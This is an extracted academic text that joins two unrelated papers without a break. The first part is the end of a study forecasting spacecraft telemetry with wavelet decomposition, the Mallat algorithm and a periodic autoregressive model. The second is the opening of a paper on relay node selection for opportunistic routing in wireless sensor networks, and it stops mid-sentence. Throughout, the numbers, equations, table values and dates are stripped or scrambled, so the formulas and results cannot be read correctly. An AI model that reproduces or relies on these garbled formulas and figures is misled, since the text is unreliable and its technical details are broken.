and it has won valuable time for the fault of the spacecraft troubleshooting, thereby increasing the safety and reliability of spacecraft operation. in this paper, based on the non-stationary and periodicity of telemetry data. based on the wavelet analysis, the prediction of the data is introduced, the establishment of a short-term forecasting model based on mallat algorithm. the experimental results show that the prediction curve is basically consistent with the actual curve. keywords-wavelet analysis; fourier transform; periodic autoregression; models; mallat. i. introduction the prediction technology of spacecraft fault has been a hot research field. after years development of prediction theory, until the discrete parameters of the linear model of a finite parameter linear model is proposed, and it is possible to combine the prediction theory with the computer. according to the different properties of the forecast, the forecasting methods are generally divided into two categories: time series forecasting and causal prediction. time series prediction is made by the past predict the future value of the prediction, and causal forecasting is through the known variables to predict the values of other variables. in this paper, the time series forecasting method is used to forecast the future development trend of the telemetry data. ii. wavelet analysis theory a. wavelet analysiss the wavelet analysis method has the characteristics of low frequency and high frequency of the non-stationary signal that change with the low-frequency information signals using a wide time window, high frequency information using a narrow time window. wavelet is a small area of the wave, waveform with special length, average of .wavelet are defined as follows [ ] . set ( )t to one square integrable function, namely ( ) ( )t l r  , if the fourier transform to meet the conditions: ˆ ( ) r c d         ( ) ( )formula called ( )t is a basic wavelet or wavelet generating function. when the generating function ( )t is expanding and translating, it can get function , ( )a t : doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , , ( ) ( ) a t t aa       , among them , ; a r a   ( ) in ( ) formula, a is the scaling factor, t is the translation factor, because the value of scale factor and translation factor is continuously changing, and depends on the parameters, it is a set of sequence of functions which are obtained by the expansion and translation of the generating function, also called sub-wavelet. b. mallat algorithm the basic idea of the mallat algorithm is as follows: let jh f as the approximation of the energy limited signal ( )f l r in the resolution j ,then the jh f is further decomposed into the approximation of jh f under the f resolution j , and the details of j d f  between j and j . ) mallat algorithm based on wavelet decomposition from multi-resolution analysis: ( ) j z j l r w    , to arbitrary function ( ) ( )f t l r ,get , , ( ) ( ) j k j k j k z f t c t    ( ) take the inner product in the side of the equation with ,j k  , because  , , ( ) j k j k z t  is the orthonormal basis of ( )l r , get , , j k j k c f  , thus to be , , , ( ) , ( ) j k j k j k z f t f t     ( ) from multi-resolution analysis, we can know that any function jf of jv ,can be expressed as the following form ( )l r , j j j j j j m m m j f f d f d d f d d d                     among , , , ( ) ( ) ( ) ( ) j j j j k j k k j k k j k k k k f t c t c t d t            ( ) j f represents the low frequency components of ( ) m f t , while ( ), , , ld t l m j  indicates the high frequency components of jf at different resolutions. because of , , , ( ) ( ) ( ) ( ) j j j j k j k k j k k j k k k k f t c t c t d t            and ,  and binary translation and scalability of orthogonality, can be obtained , , , j j j k n j n j k n n k n n c c c h          ( ) , , , j j j k n j n j k n n k n n d c c g          ( ) the formula ( ) and ( ) called wavelet decomposition algorithm of mallat algorithm, among wherein  k k zh  is a filter coefficient sequence by a two-scale equation corresponding orthogonal scaling functions. ) reconstruction algorithm of mallat algorithm the reconstruction algorithm of mallat algorithm is the inverse process of its decomposition algorithm. the convolution of mallat algorithm is represented: international journal of advanced network, monitoring and controls volume , no. , ( ) ( ) ( ) ( ) j j j j j j j c d c h d d c g c uc h ud g                 ( ) among , h  is represented conjugate inversion of filter h; jc h   represent conjugate of j c and h  ; ( ) j d c h   represent under the dual sampling of conjugate jc h  . iii. the research of telemetry data time series prediction based on mallat algorithm a. the characteristics of telemetry data telemetry data has the characteristics of non-stationary variation, commonly used statistics of the telemetry data (such as the mean and autocorrelation function, etc.) often varies with time changing, it bring very great difficulty to the telemetry data forecast. through the telemetry data and (table , ) statistics, difference is very big, every stage of the statistical parameters show that the sequence of non-stationary time series. wavelet analysis to deal with this kind of data has a great advantage. table i. the test results of a remote sensing data stationarity time mean value . . . . variance . . . . table ii. the test results of a remote sensing data stationarity time mean value . . . . variance . . . . figures , is telemetry data and for four hours of change curve, it can be seen that the output power sequence is periodicity, as well as randomness. the coexistence of periodicity and randomness, the result can be seen as the superposition of different frequency components, these frequency components superimposed on each other in the interior have similar frequency characteristics and the same variation. if the subsequence to establish a prediction model for single change, due to the change of the data characteristics of a single, reduce the difficulty of forecasting model selection. figure . data of consecutive hours curve graph figure . data of consecutive hours curve graph b. the choice of wavelet function there are some mutations in the trend of spacecraft telemetry data, and these mutations reflect the actual state of the satellite. in order to accurately capture the point of the mutation, the wavelet function is usually required to have a fast convergence, which can quickly attenuate to zero [ ] . in this paper, db wavelet is chosen as the wavelet base for the different scale of a certain remote data sequence. dbn wavelet in n= , , , , the results of scale decomposition of a telemetry data (figure ). international journal of advanced network, monitoring and controls volume , no. , figure . comparison results of dbn wavelet based n= , , , the choice of wavelet function can satisfy the following conditions except that the condition and the regularity condition [ ] . )good compact support; ) ( )t has vanishing moments; vanishing moments can make the wavelet function has a good locality in the frequency domain; )satisfy orthogonality. c. wavelet decomposition scale study due to the telemetry data is not stable, its change cycle is difficult to see, and its change is slow and fast change together, that is, the change of telemetry data cycle is the size of the cycle of nested together. therefore, separating different frequency component can make its change rule is more intuitive, and can also improve data non-stationary [ ] .the figure show the results that comparison db wavelet approximation part an decomposed at different scales and a of the original sequence. figure . comparison of different decomposition scale approximation section it can be seen that the decomposition scale is , the curve of the approximate part a has smooth enough, and basically maintained the shape of the original curve, while a , a , because of the increase in the number of points, the sampling point is reduced, the approximate partial curve is too smooth, the sequence of changes in the trend has been distorted, so this paper chose the decomposition of . d. forecasting model of time series time series forecasting [ ][ ] is one of the methods of statistical analysis. its modeling idea is the basic assumption that the change of the past of the telemetry data will continue into the future, that is, the future is a continuation of the past. in this paper, the use of the periodic autoregressive model (par model) [ ][ ] is as follows: if there is a time series x, the expression is , , ,t t t t t t p t t p t x a a x a x a x           ( ) meet the following conditions: ) t is independent sequence,expected value is t e  , variance is t t e  ; )for any , , ,i p  , it it ta a  , t it t     , , ,t    , among t is a positive number,and the model is model of par, t is the cycle length of par model,t is phase of par model. the forecast model of the telemetry data is: international journal of advanced network, monitoring and controls volume , no. , set , , , nx x x is telemetry data samples of per minute, the value of ( )tx h in the future h is the t h x  in the condition of t, and thus as its predictive value, denoted as ˆ ( )nx , according to the definition of: decomposition for telemetry data sequence prediction model is established for an hour, the selection of the length of the cycle is , namely, p=t= . this load sequence par prediction model can be represented by the expression of the following: e. predicted results analysis the predicted values of the reconstructed sub sequences of the scales are compared with the original output power trends(figure ). figure . comparison results between predicted values and actual results by analyzing the comparison between an actual telemetry data and the predicted value, it can be seen that the boundary of the predicted results and the trend of mutation is not very ideal. in this paper, the extension of the periodic continuation to the boundary of the sequence is extended. the idea of periodic continuation is that the signal is considered as a periodic signal, and the extension process is as follows [ ][ ] : , , n n m n n m x x n x x n m         among, m is the length of sequence. the comparison result of the prediction curve and the actual curve after eliminating the boundary error is shown in figure . figure . the comparison results between the predicted values and the actual values of the modified boundary from figure , we can see that the results of the prediction of the sequence are better than the results obtained by the wavelet transform. iv. the performance evaluation of the telemetry data forecasting model thought of optimal decision method is using linear transform to normalize the attribute value, and at the same time using the ideal point and negative ideal point, compared with the traditional method has more rationality and reliability. the ideal point is the best solution, and its target value is the best, the worst is the worst. the worst is the worst.the optimal solution algorithm is as follows: international journal of advanced network, monitoring and controls volume , no. , a. set decision matrix of a is ( ) ( ) ( )( ) ( ) ( ) ( )( ) ( ) ( ) ( ) ( ) n n p p p p n f x f x f xf x f x f x f xf x a f x f x f x f x                      ( ) to min( ( ), ( ), , ( )}, , , , i i i i n u f x f x f x i k   ( ) max( ( ), ( ), , ( )}, , , , i i i i n u f x f x f x i k k p     max{ ( ), ( ), , ( )}, , , , i i i i n v f x f x f x i k   min{ ( ), ( ), , ( )}, , , , i i i i n v f x f x f x i k k p     b. to determine the ideal point and negative ideal point the ideal point: * ( , , , , , , , ) t k k k p x u u u u u u      ( ) negative ideal point: , , ( , , , , ) t k k p x v v v v v     c. calculate the close degree the proximity of the ideal point ( ) [ ], , , , ( ) pk j j i i j j kj i j u f x r i n p f x u        ( ) the proximity of the negative ideal point ( ) [ ], , , , ( ) pk j i j i j j kj j i f x v r i n p v f x        ( ) d. calculate the relative close degree , , , , ,i i i i i r i n r r        ( ) by calculating the formula ( ) ( ) ( ) is as follows: the ideal point: * . , . , . , . ( , , , , , , , ) t k k k p x u u u u u u      ( ) negative ideal point: , , ( , , , , ) . , . , . , . t k k p x v v v v v     ( ) calculate the relative close degree by the formula ( ) ( ) ( ): = . from the relative closeness of view, the time series forecasting model program has a higher rationality and reliability. v. conclusion this paper studies the telemetry data forecasting method based on wavelet analysis. through the analysis of the characteristics of the telemetry data, the characteristics of the non - stationary and certain periodicity of the telemetry data are established, and the prediction algorithm based on wavelet analysis is established. by choosing different wavelet bases and the decomposition scale, the decomposition results show that , db wavelet decomposition scale is the best. based on the mallat algorithm, the time series forecasting model is established according to the characteristics of detail data and approximate data. the experimental results show that the predicted values are in good agreement with the actual values. finally, through the analysis of the performance of the forecasting model, the forecasting model is reasonable and reliable. international journal of advanced network, monitoring and controls volume , no. , reference [ ] li-zhi cheng,hong-xia wang,yong luo.the theory and application of the wavelet[m].beijing:science press, : - [ ] xiang-bing meng.research and implementation of short term load forecasting model based on wavelet analysis[d].dalian:computer application technology of dalian university of technology, . [ ] jian tang,jia-hui luan,chen lv.interval forecasting technique of remote sensing data for small satellite power supply system[j].journal of huazhong university of science and technology (natural science edition), ( ): - . [ ] jia-lin zhang,xiao-jun wei.based on the optimization model of target decision method and its application research[j].financial theory and practice. ( ): - . [ ] zhen-ming sun.forecasting theory and technology in the application of the spacecraft[d].haerbing:harbin institute of technology, . [ ] zhen-ming sun,wei-guang an,hui zhang.spacecraft data to predict the causal relation adjustment technology application research[j].journal of aerospace, ( ): - . [ ] keon-tae sohn,deuk-kyun rha.the -hour-interval prediction of ground-level temperature[j].advanced in atmosphric sicences. ( ): - . [ ] chang-il k,in-keun y,y.h.song.kohonen neural network and wavelet transform based approach to short-trem load forecasting [j]. .electric power systems research, ( ): - . [ ] soltani skander.on the use of the wavelet decmpositoin for time series prediction[j].neurocomotuing, ( ): - . [ ] zheng hua,zhang lizi.the factor analysis of short-trem laod forecast based on wavelet transform[j].ieee, : - . [ ] zhang b l,coggins r.multiresolution forecasting for futures trading using wavelet decmpositions[j].ieee trans-actions on neural netoworks, , ( ): ~ . submitted august accepted november published december corresponding authors por lip yee, porlip@um.edu.my ihsan ali, ihsanalichd@siswa.um.edu.my academic editor rajanikanth aluvalu additional information and declarations can be found on page doi . /peerj-cs. copyright yee et al. distributed under creative commons cc-by . open access improving the performance of opportunistic routing using min-max range and optimum energy level for relay node selection in wireless sensor networks por lip yee ,*, shahid mehmood ,*, ahmad almogren , ihsan ali and mohammad hossein anisi department of computer system and technology, faculty of computer science and information technology, university of malaya, kuala lumpur, malaysia department of computer science, college of computer and information sciences, king saud university, riyadh, saudi arabia school of computer science and electronic engineering, university of essex, colchester, united kingdom * these authors contributed equally to this work. abstract opportunistic routing is an emerging routing technology that was proposed to overcome the drawback of unreliable transmission, especially in wireless sensor networks (wsns). over the years, many forwarder methods were proposed to improve the performance in opportunistic routing. however, based on existing works, the findings have shown that there is still room for improvement in this domain, especially in the aspects of latency, network lifetime, and packet delivery ratio. in this work, a new relay node selection method was proposed. the proposed method used the minimum or maximum range and optimum energy level to select the best relay node to forward packets to improve the performance in opportunistic routing. omnet++ and mixim framework were used to simulate and evaluate the proposed method. the simulation settings were adopted based on the benchmark scheme. the evaluation results showed that our proposed method outperforms in the aspect of latency, network lifetime, and packet delivery ratio as compared to the benchmark scheme. subjects adaptive and self-organizing systems, agents and multi-agent systems, algorithms and analysis of algorithms, artificial intelligence, computer networks and communications keywords opportunistic routing, optimum energy, threshold energy level, relay node, wireless sensor networks (wsns) introduction opportunistic routing (or) is a routing scheme that takes advantage of the broadcasting nature of the wireless medium to improve the link reliability, efficiency, and the network throughput in multi-hop routing (chakchouk, ; eu, tan & seah, ; jadhav & satao, ). according to biswas & morris ( ), boukerche & darehshoorzadeh ( ), chachulski et al. ( ), choudhury & vaidya ( ) and larsson ( ), or improves network how to cite this article yee pl, mehmood s, almogren a, ali i, anisi mh. . improving the performance of opportunistic routing using min-max range and optimum energy level for relay node selection in wireless sensor networks. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:porlip@um.edu.my mailto:\unskip \penalty -\@m ihsanalichd@siswa.um.edu.my mailto:\unskip \penalty -\@m ihsanalichd@siswa.um.edu.my https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. performance in the context of multi-hop and mesh networks, such as relay node selection in opportunistic networks. a multi-hop network is a network of relay nodes that are connected through the communication links. due to the limited transmission range, the relay nodes in the network may not be able to communicate directly with the destination node. hence, they need other relay nodes that can forward packets to the destination node (zhao, mosler & braun, ). in or, the forwarder method selects the forwarder node that is nearer to the destination node to forward the packets (jadhav & satao, ). for the source node to forward the packets to the destination node, the or forwarder method selects a next-hop which is determined by using a routing metric such as energy, geographical distance, hop count, expected transmission count (etx), and expected transmission time (ett). these routing metrics could be used to forward the packets (menon, ). the source node constructs a list of forwarder nodes to transmit the packets to the destination node. this list is developed based on priority, and each relay node is selected based on the metrics per the or forwarder method requirements (biswas & morris, ). there are several advantages of using or. compared to legacy routing, or avoids duplicate packet transmission, and it also reduces the amount of packet retransmission significantly due to link failures. or can exploit the reception of a similar packet at multiple available relay nodes in order to improve the network performance especially in multi-hop and mesh wireless networks (biswas & morris, ; chachulski et al., ; choudhury & vaidya, ; larsson, ). in multi-hop wireless networks, packets are forwarded via at least one intermediate relay node from the source node to the destination node (coutinho & boukerche, ). a mesh wireless network is referred as a network topology in which the infrastructure of the nodes is connected directly, dynamically, and non-hierarchically to the other nodes (darehshoorzadeh, robson & boukerche, ; li et al., ). therefore, proposing an effective forwarder method to forward packets from one relay node to another in such networks is important because it will affect the performance of the networks (jain, dongariya & verma, ). throughout the years, many forwarder methods have been proposed to improve the performance of or. in general, most of the forwarder methods use routing metrics such as energy, geographical distance, hop count, etx, and ett to forward packets (menon, ). however, these methods have several drawbacks, especially in the aspects of latency, first dead node, network lifetime, and receiving packets ratio. several relay node selection methods as a means to improve the performance of routing in the opportunistic network. this study expands on the above recommendation by conducting a study that aims to improve the performance of routing in the opportunistic network. in this research work, a relay node selection method that uses maximum and minimum range (min-max range) and optimum energy level to select the best forwarder node to improve the performance in or is proposed. the simulation results showed that the proposed method could reduce the lowest latency, produced the highest time for the first dead node, improved the network lifetime, and produced a higher receiving packet ratio compared to the related works (aor, eno_or, ens_or, exor, geraf, and eeor). yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. related works in , zorzi & rao ( ) proposed a forwarder method named geographic random forwarding (geraf). this method is based on the geographical location of the nodes involved. initially, the active relay nodes, which are located nearer to the destination node, will send a ‘‘clear to send’’ message to the source node. the source node then will discover the relay nodes that can participate in the packet forwarding process around its coverage area. during the discovery, the source node will receive an acknowledgement from each of the relay nodes that can participate in packet forwarding. the source node will randomly select one of the relay nodes as the forwarder node to forward the packet. the forwarder node will use the same mechanism to randomly select another forwarder node until the packet reaches the destination node. according to the authors, this method can reduce latency because it randomly selects a relay node that can forward a packet without further delay. however, the scheduling algorithm used in this method might produce a low network lifetime because it does not consider the energy level of the relay node when determining the forwarder node. energy is an important aspect because if a relay node has a low energy level, it might die quickly, or it might drop the received packet due to insufficient energy. biswas & morris ( ) proposed a forwarder method named opportunistic multi-hop routing (exor) in . according to the author, exor is one of the initial primary protocols, which practically implemented opportunistic routing in wsns. in this method, packets deliver to the same destination are grouped in a batch by the source node. each batch has a unique id. in order to deliver the packets, the source node needs to determine a forwarder node based on distance and the etx. higher priority is given to the node, which has a shorter distance and lesser etx. the source node will construct a list of forwarder nodes based on priority. the forwarder nodes will use the list to transmit packets via end-to-end transmission. the list is maintained by each of the forwarder nodes that participated in the packet transmission. according to the authors, this method can increase the throughput of large unicast transmissions in multi-hop wireless sensor networks. however, this method produced high overhead, especially during the coordination of all the relay nodes in the network. mao et al. ( ) proposed a forwarder method named energy-efficient opportunistic routing (eeor). the authors introduced a method to select a forwarder node by calculating the cost and energy using eq. ( ). cu(fwd ∗)=chu(fwd ∗)+cfu(fwd ∗)+ccu (fwd ∗) ( ) cu(fwd∗) is denoted as the expected cost of a source node to broadcast a packet to the destination node. chu(fwd ∗) is the cost for determining the relay node. cfu(fwd∗) is the cost for determining the forwarder node. ccu (fwd ∗) is the communication cost for the forwarder node to transmit packets. the cost of ccu (fwd ∗) is incurred when the network is at the ‘‘static’’ mode. in ‘‘active’’ mode, the cost of forwarding the packets is calculated based on the traffic flows. after calculating the cu(fwd∗), this method will select the related relay nodes that have the minimum costing to forward the packets from the source node to the destination node. according to the authors, this method can minimize yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. energy consumption and improve network lifetime. however, this method uses unicast and single-path to transmit packets. moreover, it required the nodes that take part in the transmission to be in an ‘‘active’’ mode always. as a result, this method might produce high first dead node for the networks. lee & haas ( ) proposed a forwarder method named short-haul multi-hop (short- haul). this method uses the shortest route between the source node and the destination node to select forwarder nodes. in this method, a source node will firstly broadcast a message to all the relay nodes. the relay node that has the closest distance to the destination node will be selected as the forwarder node to transmit packets. the selected forwarder node will send an acknowledgement to the source node once the packets have successfully received. after that, the forwarded node will broadcast a message to all the relay nodes, and then it will forward the packets to the relay node that has the closest distance to the destination node. the process of searching the closest relay nodes will be repeated until the packets have been delivered to the destination node. this method uses multi-path routing to forward the packets to the destination node. during the transmission, the sender node will retransmit the packets if it does not receive an acknowledgement from the forwarder node. however, the forwarder nodes and the destination node will discard any duplicate packets sent by the sender node. once the destination node has received the packets, it will send an acknowledgement to all the forwarder nodes in the path. according to the author, this method is simple and can be easily integrated with other opportunistic routing algorithms. moreover, this method can reduce the packet’s duplication problem and increase the throughput of the transmission. however, this method might consume more energy. it might produce low network lifetime because the sender nodes are required to broadcast a message to all the relay nodes for determining which relay node has the closest distance to the destination node. in , luo et al. ( ) proposed a forwarder method named energy savings via opportunistic routing (ens_or). this method uses a single-path to transmit packets. to select the forwarder node, it uses distance and energy level as in eq. ( ). p(h+i)=  (dh+i−dh) [ ∣∣dh+i−dop∣∣+eh+i−ζ ] (h+i)∈f(h),−r≤ i≤r ( ) p(h) is denoted as the current forwarder node. i is denoted as an integer starting from . (d h+i − d h) is denoted as the distance between p(h) and p(h + i). e h+i signifies the remaining energy of p (h + i). ζ signifies the value of the threshold energy. f(h) is denoted as the selected forwarder list of p(h). r signifies the maximum transmission range. the source node will construct a list based on the acceptable distance and energy level. this list will become the priority list when selecting a relay node to forward packets. once the path has determined, the packets will be sent via end-to-end transmission. according to the authors, this method can reduce energy consumption and increase the network lifetime. however, this method might decrease the network performance when the single-path is congested, or the relay node has insufficient energy to forward packets through the end-to-end transmission. yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. raman & sharma ( ) proposed a forwarder method named energy optimization opportunistic routing (eno_or). this method uses energy level and distance to select a forwarder node. initially, the default threshold energy level is pre-configured. any relay node that reaches the default threshold energy level will have a chance to be selected the forwarder node. however, priority will be given to the relay node that has the highest energy level and optimal distance. the optimal distance is determined using eq. ( ). dop= m−xh nop = { ea[ (ϕ− )eβ ]} ϕ ( ) dop is denoted as the optimal transmission distance. m is denoted as the position of the forwarder node. xh is denoted as the position of the relay node. n is the index of the relay node. eβ is denoted as the energy required for the packet transmission. ϕ is denoted as the transmission loss due to link failure. according to the author, this method can increase the network lifetime by using the pre-configured energy threshold level and optimal distance. however, if the available relay nodes do not meet the minimum pre-configured threshold energy level, this method will use direct packets transmission to transmit packets to the destination node which might consume more energy. hasnain, malik & aydin ( ) proposed a forwarder method named adaptive opportunistic routing (aor). in this method, the forwarder node is selected based on minimum energy consumption and the link quality. in order to deliver the packets from the source node to the destination node, this method uses optimal route selection. to select the optimal route, it uses minimum energy consumption and maximum link quality. energy consumption is calculated based on the size of the packet delivered and the distance covered from the source node to the forwarder node. to determine the maximum link quality for forwarding the packets, this method uses the probability. equation ( ) shows the formula used to calculate energy consumption. et (p,d)= { p ( ee+γfs x d ) if d≤rc p ( ee+γmp x d ) if d ≥rc ( ) et is denoted as the transmission range. p is denoted as the packet size. ee is denoted as the overall energy consumption for the packet transmission. γfs is denoted as the forwarder node location. d is donated as an ideal range where packets can be successfully transmitted. γmp is denoted as the distance between the source node and the relay node. rc is denoted as the maximum range to select the forwarder node. equations ( ) and ( ) are used to calculate the link quality. these two equations are used to calculate the probability of the forwarding packets via a particular route and the progress of the forwarded packets at the route respectively. padv (r)=adv (r)x prob (r d s ,p) ( ) adr(r)=d(s,d)−d(s,r) ( ) yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. padv is donated as the probability of the packet delivery through route r, which is established based on the broadcast messages among the relay nodes. prob ( rds ,p ) is denoted as the probability of the successful packets delivered from the source node to the destination node. adv(r) is donated as the progress of the forwarded packets thought route r. d(s,d) is donated as the total distance from the source node to the destination node. d(s,r) is donated as the distance of the possible forwarder node from the source node. according to the authors, this method can minimize energy consumption when forwarding the packets using the optimal route selection. however, this method only uses single-path and end-to-end transmission. as a result, it might increase the latency and end-to-end delay when the relay node has insufficient energy or the link quality is poor. khan et al. ( ) proposed a forwarder method named cooperative energy efficient optimal relay selection (co-eeors). this method produces reliable packet delivery. the forwarder node is selected based on the lowest depth and the value of the lowermost location. the value of the location interfaces and measures the distance between the source node and the destination node. relay nodes that are located closest to the destination node will have a smaller value of the location. a relay node is selected as a forwarder node to forward the packets if it is closest to the destination node. the destination node sends an acknowledgement to the source node after receiving the packets successfully. according to the author, the proposed method achieved a higher receiving packets ratio as compared to other forwarder methods. however, there is a limitation with regards to the performance of co-eeors, and this seems an exceptional condition. it occurs when there is a larger distance between the relay nodes, and when the source nodes can not find the forwarder nodes, thus cooperation fails due to link failure. as a result, this method could increase overhead and latency. li et al. ( ) proposed a forwarder method named multi-hop wireless networks (mwn). in this method, the forwarder node is selected using energy-efficient metric. the energy-efficient metric is comprised of several parameters such as one-hop distance (r ,t ), transmission range (r ,t ), and the distance between the relay node and the destination node (dt ). the average forwarding distance and the total energy consumption are calculated for each hop using eq. ( ) and the energy consumption for each hop is calculated using eq. ( ). d(n)=min ≤i≤n{di} ( ) di is denoted as the distance between the relay node i and the destination node. if the relay node i successfully decodes the packet, di will be given a value equals to the euclidean distance from i to the destination node. otherwise, di will be given a value equal to dt . eall ( r ,t,r ,t ) = [ e +ect +stpecr ] ∗l, ( ) r is denoted as the radius of the relay node. e is denoted as the packet transmitting energy per bit. stp is denoted as the size of the forwarding area. ect and ecr are denoted as the transmitter and the receiver circuit energy consumption per bit for each relay node respectively. yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. according to the authors, the use of the energy-efficient metrics can optimize the average forwarding distance with minimum energy consumption. however, the forwarder node in this method is selected dynamically. as a result, the selected forwarder nodes might have insufficient energy to forward the packets. when this situation happens, the packet receiving ratio will be decreased. chithaluru, tiwari & kumar ( ) proposed a forwarder method named adoptive ranking based energy-efficient opportunistic routing (areor). this method uses single path and end to end transmission to transmit the packet from source node to destination node. it selects the best relay node to take an interest as a cluster head by utilizing versatile participatory criteria. forwarder node is selected based on an adoptive ranking system. relay nodes ranking is determined by computing the remaining energy and location closest to the destination node. according to the author, this method reduces energy consumption by using the adoptive ranking and optimal energy node selection. however, in this method, the forwarder node is selected based on the cluster and adoptive ranking system. network performance will be decreased if available nodes have insufficient energy to forward the packets. zhang et al. ( ) proposed a forwarder method named shortest-latency opportunistic routing in asynchronous wsns. this method theoretically examines the techniques on how to select a forwarder node in asynchronous wireless sensor networks (wsns). the proposed approach develops the probability for the relay node to be selected as a forwarder node. this method uses single-path and bop-by-hop transmission to transmit packets from source node to destination node. according to the author, end-to-end latency for opportunistic routing in asynchronous wsns is theoretically achieved in this approach. however, this method might decrease network performance and to determine the real implication of this approach in terms of energy efficiency, there is a need to implement the proposed approach practically. wang ( ) proposed a three-layer framework is used multiple mobile sinks with fog structure. the proposed framework aims to break the bottleneck of data collection from wsns to the cloud. the framework was compared with various existing traditional solutions. the experimental result reveals that the framework can help in the improvement of throughput and the reduction of transmission delay. liang ( ) proposed a reliable trust computing mechanism (rtcm). the framework helps in enhancing the reliability and efficiency of data transfer to the cloud. the result shows some promise. thakkar and kotecha proposed a routing algorithm that utilizes the energy-delay index for a trade-off to optimize both objectives-energy and delay (thakkar, a; thakkar, b). the result shows that the proposed algorithm performs well. thakkar and kotecha further proposed a cluster formation technique with a decentralized cluster head election method (thakkar, ). the authors used bollinger bands to elect a cluster head. the result shows significant improvement. in another study by thakkar, the author proposed an advanced leach protocol named deal (thakkar, ). the protocol takes energy and distance of a node into consideration during cluster head election process. the result shows that the proposed protocol enhances the stability period in comparison to the yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. existing state-of-the-art. furthermore, thakkar also published two more studies in the research theme (thakkar, a; thakkar, b; thakkar, ). table shows the synthesis of the selected related work. from the review, we noticed that most of the existing forwarder methods produce high first dead node, high latency, high energy consumption, and less network lifetime. several reasons cause these weaknesses to happen. for example, some of the forwarder methods do not consider energy level, and they always need to broadcast messages to all the relay nodes when determining the forwarder node. as a result, these types of forwarder methods might cause the relay node to die quickly or drop the received packet due to insufficient energy. moreover, some of the forwarder methods use unicast, single-path, and end-to-end transmission to transmit packets. these types of transmissions might increase the latency and end-to-end delay when the relay node has insufficient energy, or the link quality is poor, or the path is congested. from this review results, it is shown that there is still room for improvement in this domain, especially in the aspects of latency, first dead node, network lifetime, and receiving packets ratio. thus, this research was carried out to propose a relay node selection method to improve the drawbacks above. materials & methods in this section, the simulation settings used by luo et al. ( ) to evaluate the proposed method are presented. the simulation is conducted in omnet++ simulator and mixim framework. the proposed method and the related works are simulated using the simulation settings in table . omnet++ and mixim are chosen because they have the required libraries such as stdio.h, string.h, omnetpp.h, ‘‘bs.h’’, ‘‘node.h’’, ‘‘cl_msg_m.h’’, ‘‘gesteb.h’’, and c utvector class which are required when implementing the proposed method and the related works (bouachir et al., ; zhao, mosler & braun, ). the simulation is carried out in an area of m network size with nodes that are uniformly deployed. the network consists of one source node, one destination node, and relay nodes. the maximum range between relays nodes is m, while the minimum range is m. the packet size , bit is used for transmission. the initial threshold energy level is set as %. the sending rate is one packet per second. the simulation time is set s and adopted from luo et al. ( ). the simulation is executed times for each result, as suggested by ritter et al. ( ). the simulation results are collected individual and manually, and ‘‘r’’ program is used to compare the results proposed methods to provide a clear overview, a high-level description of the proposed method is described in this section. to ease the explanation, we pre-configured the threshold energy and the energy level for each relay node before demonstrating how a given packet is sent from the source node to the destination node. initially, the source node will select a relay node to forward a packet based on the distance and the energy level. in the previous studies, some methods used either distance or energy level to perform routing. moreover, several researchers (hawbani et al., ; kannan & raja, ; nadar et al., ) reported that yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison of selected related works. forwarder method year routing mechanism forwarding list selection advantages disadvantages geraf (zorzi & rao, ) multi-path hop-by-hop � reduce latency. � decrease network lifetime. exor (biswas & morris, ) single-path end-to-end � increase throughput. � increase overhead. eeor (mao et al., ) single-path end-to-end � minimize energy consumption. � increase network lifetime. � produce high first dead node. short-haul (lee & haas, ) multi-path hop-by-hop � increase throughput � reduce the ratio of the duplication packets. � produce high energy consumption. � decrease network lifetime. ens_or (luo et al., ) single-path end-to-end � minimize energy consumption. � increase network lifetime. � decrease network performance. eno_or (raman & sharma, ) single-path hop-by-hop � increase network lifetime. � consume more energy. aor (hasnain, malik & aydin, ) single-path end-to-end � minimize energy consumption. � increase latency. � end-to-end delay. co-eeors (khan et al., ) single-path end-to-end � increase receiving packets ratio. � increase overhead. � increase latency. mwn (li et al., ) single-path hop-by-hop � minimize energy consumption. � decrease receiving packets ratio. areor (chithaluru, tiwari & kumar, ) single-path end-to-end � reduce energy consumption. � decrease network performance. shortest-latency (zhang et al., ) single-path hop-by-hop � reduce latency. � decrease network performance. wang et al. (wang, ) single-path hop-by-hop � minimize energy consumption. � increase latency. liang et al. (liang, ) multi-path hop-by-hop � increase throughput. � decrease network lifetime. thakkar and kotecha (thakkar, a; thakkar, b) multi-path hop-by-hop � increase network lifetime. � reduce the ratio of the duplication packets. � decrease network lifetime. thakkar and kotecha (thakkar, ) multi-path hop-by-hop � minimize energy consumption. � reduce latency. � decrease network performance. thakkar (thakkar, ) single-path end-to-end � minimize energy consumption. � increase latency. thakkar and kotecha (thakkar, a; thakkar, b) multi-path hop-by-hop � minimize energy consumption. � reduce latency. � decrease network performance. thakkar (thakkar, ) multi-path hop-by-hop � minimize energy consumption. � reduce latency. � decrease network performance. yee etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table simulation settings. parameter values network size m× m node deployment uniform number of nodes source node destination node relay nodes maximum range m minimum range m packet size , bit threshold energy level % sending rate packet/s simulation time s distance and energy levels are the most commonly used metrics to select the best relay node. therefore, we used and improvised these two metrics in our proposed method to select a relay node. in our proposed method, the selected relay node is called the forwarder node. the source node will forward the packet to the forwarder node. after transmitting the packet, the energy level of the source node will be reduced based on the distance covered and the size of the packet delivered during the transmission. the current forwarder node will use the same mechanism to select another relay node to become the next forwarder node. similarly, the energy level of the current forwarder node will be reduced after the packet is transmitted to the next forwarder node. this process will be repeated until the packet reaches the destination node. hence, the proposed method has a distributed architecture. proposed method illustration assuming that a source node (s) is going to transmit a packet to a destination node (d), and the pre-configured threshold energy level is 